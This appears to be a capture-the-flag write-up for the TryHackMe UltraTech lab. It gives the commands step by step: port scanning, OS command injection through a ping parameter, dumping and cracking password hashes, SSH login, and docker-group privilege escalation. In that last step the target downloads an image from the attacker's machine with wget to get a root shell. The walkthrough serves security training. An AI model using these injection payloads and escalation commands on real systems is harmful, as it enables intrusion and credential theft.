UltraTech-TryHackMe

 

This is a write-up for TryHackMe's room named UltraTech :- https://tryhackme.com/room/ultratech1

Room's Details: The basics of Penetration Testing, Enumeration, Privilege Escalation and WebApp testing and according to the author this room was based on real world scenario which makes this room more interesting and useful.

Deploy the machine and scan for all the open ports:

sudo nmap -sS -Pn -T4 -p- 10.10.75.119

This quickly gives us all the open ports and now lets enumerate further only using these ports: 

sudo nmap -O -A -Pn -T4 -p21,22,8081,31331 10.10.75.119

This should give us the first four answers for [Task 2]. For Question 5 run dirb like:

dirb http://10.10.75.119

and that will reveal robots.txt: 

and then utech_sitemap.txt and we will get the answer.

Navigate all the webpages we found above and use Burp Suite to see how they are interacting with the Web Server. Start with http://10.10.75.119:31331/partners.html and we will get some kind of login page:

In Burp Suite we can see a request going to the Web Server every 10 second which looks to be a ping command:

Open up this get request in Browser using : http://10.10.75.119:8081/ping?ip=10.10.75.119 and we can verify the same.

This look to be a good candidate for OS Command injection and after trying few option we are able to execute OS command using http://10.10.75.119:8081/ping?ip=10.10.75.119%0Als :

We are also able to find the Database file which was asked in the question in [Task 3]. Lets now try to see the content of that database file using cat command:

We are able to dump the hash for user named r00t and one other user. Both the hashes can easily be cracked using:

• https://crackstation.net/

We should now be able to answer rest of the questions for [Task 3]

Using these credentials we are able to login via SSH with user "r00t".

"r00t" user is a low privilege user but a part of docker group.

Now [Task 4] is all about Privilege escalation and usually I run few of the famous scripts for Linux Privilege Escalation, in this case I ran LinPEAS.sh:

• https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

In the starting itself script indicated a 99% PE vector via docker group:

After searching I found the following useful resources which do Privilege Escalation via docker group:

• https://github.com/chrisfosterelli/dockerrootplease

The problem was this method was trying to pull the docker images via internet but our target machine was not connected to internet. After looking around I found this stackoverflow post which helped in first getting the image locally on to the attacking machine and then on to the target machine from attacking machine before running the exploit:

• https://stackoverflow.com/questions/48125169/how-run-docker-images-without-connect-to-internet

Used this resource to install docker on Kali:

• https://www.ceos3c.com/hacking/install-docker-on-kali-linux/

Ran the following command on attacking machine:

sudo docker pull chrisfosterelli/rootplease sudo docker save --output rootplease.tar chrisfosterelli/rootplease sudo chmod 755 rootplease.tar python3 -m http.server

and the following commands on the Target machine:

wget http://10.9.6.174:8000/rootplease.tar docker load --input rootplease.tar docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease

Running the last command above resulted in a root shell :)

To get the Final answer run the following and read the private ssh key for root: